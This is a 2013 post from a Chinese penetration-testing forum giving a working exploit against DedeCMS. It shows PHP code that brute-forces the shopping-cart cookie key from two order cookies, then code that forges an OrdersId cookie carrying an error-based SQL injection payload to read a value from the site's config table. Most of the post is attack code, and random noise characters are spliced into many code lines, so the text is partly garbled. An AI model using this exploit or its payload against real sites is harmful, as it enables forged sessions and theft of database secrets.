中国网络渗透测试联盟

标题: 织梦CMS漏洞dedecms漏洞SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-13 23:58
标题: 织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
+ A" B# i# S6 _5 |  ^239      function saveCookie($key,$value)
240      {
241          if(is_array($value))
242          {
( t2 |% B3 C* C9 u9 `* [: _- F2 D243              $value = $this->enCrypt($this->enCode($value));
9 \  X) q" B+ ?+ K8 d  l7 `" {244          }
245          else
- s; l5 W" O7 B- c246          {
4 n- N  B; ^+ F247              $value = $this->enCrypt($value);
248          }
5 g0 ~7 W  y9 h* m3 c( b7 s249          setcookie($key,$value,time()+36000,’/');
, d- h- l; ^# b( F% B! P( P250      }
$ o7 ]) K8 b3 D% T5 W简单的说，$key就是cookie的key，value就是value，enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型，关键是enCrypt函数
186      function enCrypt($txt)
: q: g$ W4 r1 R) S8 c187      {
188          srand((double)microtime() * 1000000);
189          $encrypt_key = md5(rand(0, 32000));
+ d8 g$ ]6 E$ B" a, S; ?190          $ctr = 0;
/ J- m" f( n, s* J! C/ v0 ^' Q+ N- Q191          $tmp = ”;
* y# v- @$ E9 W$ Q3 I192          for($i = 0; $i < strlen($txt); $i++)
193          {
194              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
195              $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
196          }
5 P! s5 t: I" h  w197          return base64_encode($this->setKey($tmp));
198      }
213      function setKey($txt)
214      {
215          global $cfg_cookie_encode;
2 Q; \; V" V  m% a) S6 Z216          $encrypt_key = md5(strtolower($cfg_cookie_encode));
- u, P$ ~3 u% o# X217          $ctr = 0;
218          $tmp = ”;
; i7 J, j) z4 I% ?# c% U" v  p6 z219          for($i = 0; $i < strlen($txt); $i++)
: C/ d- U0 g! f% N220          {
221              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
222              $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223          }
224          return $tmp;
225      }
, ~9 M" [8 B, `7 \4 uenCrypt的参数$txt 我们是可知的，返回值就是cookie的值，这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp，这个参数在某种意义上，我们也是可知的，因为$encrypt_key = md5(rand(0, 32000));只有32000种可能，我们可以推出32000种可能的$tmp，从而推出32000种可能的md5(strtolower($cfg_cookie_encode))，对了，忘记说了，我们的目的是推测出setKey中$encrypt_key的值，然后才能任意构造出购物车的cookie，从推出的32000种md5(strtolower($cfg_cookie_encode))，简单过滤掉非字母数字的key，就只剩下几百个可能的key，然后我们再从新下一次订单，然后再获取几百个可能的key，然后取交集，得到最终key。
具体代码如下：
<?php
: Z$ u& F9 s& M$ M4 }  u# D$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
+ B, c7 @! Q  F" T# ~$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
, h2 r  |# w" O& V- P  X: F8 k$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
function reStrCode($code,$string)
{
$code = base64_decode($code);
# C  l% \- h- q( _( k3 p$key = “”;
for($i=0 ; $i<32 ; $i++)
{
$key .= $string[$i] ^ $code[$i];
}
% |4 j6 ?: g% S* i! p# A  e* ]return $key;
, p# K. \6 M: ]  u& c9 [, ?}
+ @8 E4 l/ ~9 lfunction getKeys($cookie,$plantxt)
{
9 s+ `  }) _  c; J$tmp = $cookie;
$results = array();
for($j=0 ; $j < 32000; $j++)
- ]& o& n6 i' _& G  K# U" W, n{

$txt = $plantxt;
% |1 g+ d$ e; q/ h# ~% G% ^4 \$ctr = 0;
8 M5 i+ h9 V4 b6 ~$tmp = ”;
+ t0 a" X+ {, f9 |$ }7 V8 N$encrypt_key = md5($j);
- |. v  ?" Q% ]! {+ ~. Efor($i =0; $i < strlen($txt); $i ++)
# }' j9 V1 ~* n/ S9 y{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
' w, @4 D3 q1 i( a# R( L$string = $tmp;
4 P& n8 e7 n$ @, ]" c$code = $cookie;
$result = reStrCode($code,$string);
- Q$ l% Y* s0 X/ uif(eregi(‘^[a-z0-9]+$’,$result))
{
echo $result.”\n”;
+ `( K8 a# Q* J( m! W: z$results[] = $result;
}
, D, P' v: j2 I6 n: ?7 ]8 k}
return $results;
- i; N9 F6 c0 |4 V' ^3 B}
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
6 F. e, S1 \7 p  oforeach($results1 as $test1)
{
# _* R. y( l# M. o: `, S" [foreach($results2 as $test2)
% ~' C0 A4 N7 R* K& [% k8 `{
' U4 x5 ]/ h5 f. J& c- o, Z% ?if($test1 == $test2)
{
echo $test1.”\n”;
}
1 a( e, a2 A6 e}
2 i# G: c. }$ v9 k( G}
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie，
plantxt可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
) F) `5 F: I4 T- i3 Z然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后，我们就可以构造任意购物车的cookie
3 m, U2 g- |  ~& N4 m( y7 `- C接着看
' A1 @; F, W% E8 k- d, N1 p20  class MemberShops
* p+ [6 f' Y3 e+ P9 C6 Y) z: n3 k21  {
22      var $OrdersId;
7 q; S! S+ v9 Z- m( P( U23      var $productsId;
24
: \$ J3 x( I% f3 d8 q2 X25      function __construct()
; \) q+ y" e  J+ p" m  t26      {
27          $this->OrdersId = $this->getCookie(“OrdersId”);
28          if(empty($this->OrdersId))
29          {
: |2 ~' J/ |/ T30              $this->OrdersId = $this->MakeOrders();
31          }
  Y! r$ k" a+ O& a$ ^% Z32      }
发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
29      $cart    = new MemberShops();
39      $OrdersId = $cart->OrdersId;        //本次记录的订单号
1 D2 G+ _7 N. o* W+ X% }  ?$ q……
# O" A" ^; G4 [! }173          $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
5 G! W: C% P0 {+ o& u6 t接着我们就可以注入了
; W$ p: x+ S5 R& q1 Q/ V; r6 {通过利用下面代码生成cookie：
. R- d3 x; u) [<?php
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″;   // here is the key, please change here
# I$ \+ a: ^& V, Dfunction setKey($txt)
* A( g7 F$ P/ N0 X0 B3 m{
8 w$ b3 Q: M: Oglobal $encrypt_key;
$ctr = 0;
$tmp = ”;
8 n, W! c5 A; s2 F$ ~1 }+ rfor($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) i, o: A5 K% j( z- G1 F$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
2 M" E. B2 k8 e  f3 I4 xreturn $tmp;
- g: `1 S# q5 d* g}
function enCrypt($txt)
$ o  R# z# a! m5 W7 h+ O! w{
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
1 e0 F" v; q8 J' n$ctr = 0;
$tmp = ”;
  f5 g" j0 {5 @' @' q9 z. J2 u% n( Dfor($i = 0; $i < strlen($txt); $i++)
{
4 t# p  r/ \; w; i; F# u. O$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
* H6 i" A5 h" \% n' E7 P$ Q. ^/ l5 R( n$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(setKey($tmp));
}
for($dest =0;$dest = enCrypt($txt);)
. f# G2 {2 h0 J) t, M{
  Y+ _$ z  M) c- P3 rif(!strpos($dest,’+'))
{
break;
}
) n  L0 ]7 m7 O6 ~. P}
echo $dest.”\n”;
?>

​

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2